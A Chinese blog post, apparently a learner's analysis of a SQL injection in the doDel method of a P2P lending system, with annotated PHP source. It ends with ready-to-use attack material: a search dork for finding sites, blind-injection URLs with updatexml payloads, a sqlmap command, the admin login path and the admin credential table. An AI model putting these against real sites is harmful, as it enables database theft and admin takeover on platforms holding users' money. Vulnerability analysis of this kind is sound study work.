在安全脉搏上面看到的这个程序,虽说已经有文章了。但是对于小菜鸟的我还是想要尝试着分析一下下。学习学习。嘻嘻。

Action

先把源码抠过来。

漏洞文件:App\Lib\Action\HCommonAction.class.php

且看漏洞产生的关键位置:

 1 <?php
 2 /**
 3  * 以上code省略...by:DEF
 4  */
 5 public function doDel(){ #首先定义了一个删除的类
 6
 7         $model = D($this->getActionName()); #引用getactionname
 8
 9         if (!empty($model)) { #如果说$model不为空执行下面的语句否则不做任何操作。
10
11             $id = $_REQUEST['idarr'];#漏洞产生地点!此处的idarr未经任何处理!就将其带入二十三行执行sql,进行删除数据,故由此引发sql注入
12
13             if (isset($id)) {
14
15                 if (method_exists($this, '_doDelFilter')) {
16
17                     $this->_doDelFilter($id);
18
19                 }
20
21
22
23                 if (false !== $model->where("id in ({$id})")->delete()) {
24
25                     $this->success(L('删除成功'),'',$id);
26
27                 } else {
28
29                     $this->error(L('删除失败'));
30
31                 }
32
33             } else {
34
35                 $this->error('非法操作');
36
37             }
38
39         }
40
41     }
42
43  ?>

因为没有任何的输出,所以对待此类猪肉只能使用盲注。凡是继承了这个HCommonAction类的都存在这个sql漏洞。

以上文件都是继承了HCommonAction类的文件。

borrow,fund,dodel下的idarr参数都是可以注入的。

PS:其实这个漏洞危害性还是有的。

inurl:member/common/register/
http://localhost/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
http://localhost/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
http://localhost/home/Fund/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)

可爆管理员后台:/App/Tpl/Admin/default/Index/login.html

sqlmap.py -u "https://www.xxxx.com/home/borrow/doDel/" --data "idarr=updatexml(1,if(1=1*,1,0x22),1)" --dbms=mysql --technique=B --random-agent --threads=6 --dbs

管理员默认的用户表:lzh_ausers下的user_name,user_pass,user_word

THE END

转载于:https://www.cnblogs.com/xishaonian/p/6232643.html

绿麻雀网贷系统通用注入分析相关推荐

  1. 第三方开发的网贷系统安全如何保障

    近年来,互联网金融高速发展,据盈灿咨询发布的<2015中国网络借贷行业蓝皮书>预计在2016年,P2P网贷行业体量仍将迅速扩大,年成交量或达2万亿元,贷款余额达1.5万亿元,巨额沉淀资金和 ...

  2. P2P网贷系统开发公司

    杭州融都商务咨询有限公司 融宝借贷 诺帮友信 五洲财富 万家兄弟 鼎峰p2p 尚贷 帝友 [厦门] 帝友和融都都在5-6万左右, 绿麻雀的3万的那个版本没有流转标,带流转标的5万,还是尚贷的实在,3万 ...

  3. p2p网贷系统的架构设计

    p2p网贷系统,标准版已经初步完成了.     最近写点总结,也算是分享吧. 简介:p2p网贷系统,是理财类的互联网金融系统.核心功能,就是理财人用户注册,冲钱,然后投标,标到期之后,收到回款.如果不 ...

  4. 告别网贷系统圈钱模式,开启P2P网贷系统免费时代

    在这个所谓互联网金融爆发的时代,很多传统的线下行业,都希望可以这一块肥肉上插上一脚,特别是对于贷款业务的公司,那么问题来了,如何选择一家P2P网贷系统开发商,是平台建立的第一步,也是最令大家担忧的,也 ...

  5. 九天鸟p2p网贷系统的架构设计

        九天鸟p2p网贷系统,标准版已经初步完成了.     最近写点总结,也算是分享吧. 简介:p2p网贷系统,是理财类的互联网金融系统.核心功能,就是理财人用户注册,冲钱,然后投标,标到期之后,收 ...

  6. P2P网贷系统开发的软件测试

    p2p网贷系统开发的软件测试工作贯穿整个项目,是p2p网贷系统生命周期中很重要的组成部分,主要工作目的是尽早发现p2p网贷平台软件存在的问题,并迅速的解决.那么p2p网贷系统开发的软件测试可以分为几类 ...

  7. 网贷系统架构——前端框架的选择

    一.网贷系统对前端的要求 网贷,又称P2P网络借款.P2P是英文peer to peer的缩写,意即"个人对个人". 网络信贷起源于英国,随后发展到美国.德国和其他国家,其典型的模 ...

  8. p2p mysql 数据的拆分 案例_浅析: P2P网贷系统数据库设计

    许多人对于P2P网贷系统的技术环境并不熟悉,导致不少运营商被开发商忽悠的情况屡见不鲜.今天我们就从数据库出发,给大家讲一讲有关P2P数据库技术的知识.首先,数据库架构的设计是开发一套P2P网贷系统的前 ...

  9. 融金所孙明达:科技金融赋能网贷系统安全

    近日,融金所创始人孙明达在接受记者采访时表明:我国已经成为金融科技大国,金融科技正在扮演越来越重要的角色,融金所已经越来越重视金融科技创新.特别是在互联网众多安全问题下,科技金融能够为网贷系统安全保障 ...

最新文章

  1. 既然安卓是开源的 为何华为要 鸿蒙,安卓靠开源、免费赢得了天下,现在华为鸿蒙也是开源免费的! - 区块网...
  2. 面试必问:Spring循环依赖的三种方式
  3. Spring加载resource时classpath*:与classpath:的区别(转)
  4. python编写脚本,删除固定用户下的所有表
  5. 第二批鸿蒙手机排行,鸿蒙系统第二批升级机型有哪些 鸿蒙系统第二批升级机型名单一览...
  6. Linux系统安装MySql步骤及截屏
  7. 旗下首发双模5G+双挖孔全面屏!Redmi K30真机谍照曝光
  8. 曾遭闪电贷攻击的Origin将重新推出稳定币OUSD
  9. HDU 12O3 I NEED A OFFER!
  10. 分享:EditText默认不弹出软件键盘
  11. 学习 Java,使用哪个版本最好
  12. 动态考勤表-日期只能在某个月选时间段
  13. 稻城亚丁徒步攻略,与你共同感受这片净土
  14. 软件工程之QA管理(好软件系列二)
  15. [Power Query] 添加列
  16. 网页控制台控制视频倍速
  17. TCP连接,三次握手问题
  18. [转载].NET商业软件源码保护
  19. 大学本科毕业生如何免费进行论文查重
  20. 单位转换html代码,JavaScript实现长度单位转换

热门文章

  1. win服务器网络优化,还能再快一点,Win7网络优化参数详解
  2. Java实现邮件发送 超详细!!!(以QQ邮箱个人版和企业版为例)
  3. c#五子棋实验报告_C#实现五子棋游戏
  4. TransactionTemplate编程式事务
  5. 考到项目管理PMP证书后该如何获得PDU?
  6. 基于神经网络语言模型的中文新闻文本聚类算法
  7. 国开计算机上机表格试题答案,国家开放大学《计算机应用基础》考试与答案形考任务模块3模块3Excel2010电子表格系统—客观题答案...
  8. 加一问题中的灵光一闪
  9. 漂亮的女程序员找不到另一半?又想骗我当程序员
  10. layui input标签设置只读 不可编辑 背景灰化